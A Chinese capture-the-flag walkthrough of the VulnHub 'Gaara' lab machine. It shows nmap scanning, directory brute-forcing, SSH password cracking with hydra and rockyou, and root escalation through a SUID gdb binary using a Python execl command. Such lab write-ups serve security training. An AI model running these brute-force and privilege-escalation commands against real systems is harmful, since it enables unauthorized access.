实战打靶集锦-026-Gaara


靶机地址:https://download.vulnhub.com/gaara/Gaara.ova

1. 主机发现

目前只知道目标靶机在192.168.232.xx网段,通过如下的命令,看看这个网段上在线的主机。

$ nmap -sP 192.168.232.0/24

在这里插入图片描述
锁定目标靶机IP为192.168.232.146。

2. 端口扫描

通过下面的命令对目标靶机进行端口扫描。

$ sudo nmap -p 1-65535 192.168.232.146 

在这里插入图片描述
开放的端口不多,只有一个22端口和80端口,接下来枚举一下对应的服务。

3. 服务枚举

通过下面的命令枚举一下目标端口上的服务。

$ sudo nmap -p22,80 -A -sT -sV 192.168.232.146

在这里插入图片描述
信息不是太多,还是直接探查一下。

4. 服务探查

先用浏览器访问一下看看。
在这里插入图片描述
感觉是有个图片,不过显示不出来,还是枚举一下目录吧。

$ dirsearch -u http://192.168.232.146:80/ 

在这里插入图片描述
有些诧异,竟然没有一个是可以直接访问的内容。用dirb挂载big字典试试看。

$ dirb http://192.168.232.146 /usr/share/wordlists/dirb/big.txt

在这里插入图片描述
效果是一样的,感觉有些无从下手。猛然想起可能是我之前打靶时修改了/etc/hosts文件导致的,修改回来再试一下,结果还是同样的现象,有点难以置信啊,再试试gobuster。

$ gobuster dir -u http://192.168.232.146:80/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

在这里插入图片描述
额,gobuster确实更胜一筹,扫描出了一个/Cryoserver的目录,并且还是200,手工进去看看。
在这里插入图片描述
打开也是空空如也,看看页面源代码。
在这里插入图片描述
跟上个靶机一样的尿性,最底下有三个目录,分别进去看看。
在这里插入图片描述
全都报404啊,去掉前面一层/Cryoserver目录试试看,结果全都是如下图所示的密密麻麻的文字。
在这里插入图片描述
大概看了一下,没有发现什么异常内容,不过感觉三个页面的内容都差不太多,先通过比对工具(这里直接用meld工具进行三路比对)看一下有什么区别。发现/Temari和/Kazekage的内容是一致的,不过跟/iamGaara的内容不一致,有一个类似于密码的一串内容,甚是可疑,如下图。
在这里插入图片描述
但是哪个用户的密码呢?文本中出现了好几个名字,直接用cewl针对/iamGaara页面生成一个用户名列表,并采用小写字母。

$ cewl --lowercase -m 3 -x 10 http://192.168.232.146/iamGaara > myUser.txt
$ hydra -L myUser.txt -p f1MgN9mTf9SNbzRygcU 192.168.232.146 ssh

在这里插入图片描述
爆破失败,先手工试试gaara是不是我们需要的账号吧。
在这里插入图片描述
也看不出来,直接用gaara用户挂上rockyou爆破一下看看。

$ hydra -l gaara -P ../../rockyou.txt 192.168.232.146 ssh

分分钟爆破成功,gaara用户的密码是iloveyou2,手工登录进去看看。

5. 突破边界

通过下面的命令登录一下gaara用户。

$ ssh gaara@192.168.232.146 -t "bash --noprofile"

在这里插入图片描述

6. 提权

先优化一下shell。

gaara@Gaara:~$ whereis python
gaara@Gaara:~$ /usr/bin/python3.7 -c "import pty;pty.spawn('/bin/bash')"

6.1 枚举系统信息

通过下面的命令枚举一下。

gaara@Gaara:~$ uname -a
gaara@Gaara:~$ cat /etc/*-release

在这里插入图片描述
是64位的debian10。

6.2 查看passwd文件

先看看passwd中有哪些用户。

gaara@Gaara:~$ cat /etc/passwd | grep -v "nologin" 

在这里插入图片描述
除了gaara和root也没有其它的用户,看看是否有写入权限。
在这里插入图片描述
没有权限。

6.3 查看定时任务

先看看是否有定时任务。

gaara@Gaara:~$ cat /etc/crontab

在这里插入图片描述
没有可疑任务发现。

6.4 查看可执行文件

先看看是否有可执行文件。

gaara@Gaara:~$ sudo -l

在这里插入图片描述

gaara@Gaara:~$ find / -user root -perm -4000 2>/dev/null

在这里插入图片描述
暂时看不出异样,等会儿用linpeas看一下。

6.5 查看家目录

看看家目录下都有些啥。

gaara@Gaara:~$ ls -lah ~/

在这里插入图片描述
这里面有个Kazekage.txt的文件比较可疑,里面的内容很像是一个密码,或者编码后的内容。
在这里插入图片描述
其它没有太特殊的内容,先把这一串内容看看是否可以base64之类的解码一下。

gaara@Gaara:~$ echo "L3Vzci9sb2NhbC9nYW1lcw==" | base64 -d

在这里插入图片描述
额,莫非解码的内容就是“/usr/local/games”?把这个再base64编码一下看看吧。
在这里插入图片描述
还真是,既然这样,就到这个目录下去看看吧。
在这里插入图片描述
额,又是一个比较可疑的文件,看看里面都是啥。
在这里插入图片描述
完全看不懂,这条线估计要断了。

6.6 Linpeas提权

直接用linpeas看看吧。

gaara@Gaara:~$ chmod u+x linpeas.sh
gaara@Gaara:~$ sh linpeas.sh

看到/usr/bin/gdb具有SUID权限。
在这里插入图片描述
直接用gdb尝试一下提权。

gaara@Gaara:/tmp$ /usr/bin/gdb -nx -exec '!bash'

在这里插入图片描述
感觉貌似提权成功了,验证一下看看。
在这里插入图片描述
看来我高兴的太早了,并没有提权成功,添加一下sudo试试。

gaara@Gaara:/tmp$ sudo /usr/bin/gdb -nx -exec '!bash'

在这里插入图片描述
直接没有权限。不过从网上找到用gdb执行python指令是可以提权的,试一下。

gaara@Gaara:/tmp$ /usr/bin/gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit

在这里插入图片描述
这次出现了心心念念的#,应该是提权成功了,验证一下。
在这里插入图片描述
确实成功了。

7. 获取flag

获取一下flag。
在这里插入图片描述

写在最后

其实前面我们发现的一段乱七八糟的内容,后来查了一下,是有出处的,叫做brainfuck。Brainfuck是一种极小化的计算机语言,它是由Urban Müller在1993年创建的。由于fuck在英语中是脏话,这种语言有时被称为brainf*ck或brainf**k,甚至被简称为BF。这就是一个语言,但它不像C++那么多元化,但难度也一定的增加,因为它只有8种关键字!它有很多种特性,这里就不一一说明了,我们直接把前面的那一坨东西解码看看是啥。
在这里插入图片描述
就是依据简单的调侃的文字,没有什么特别的。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值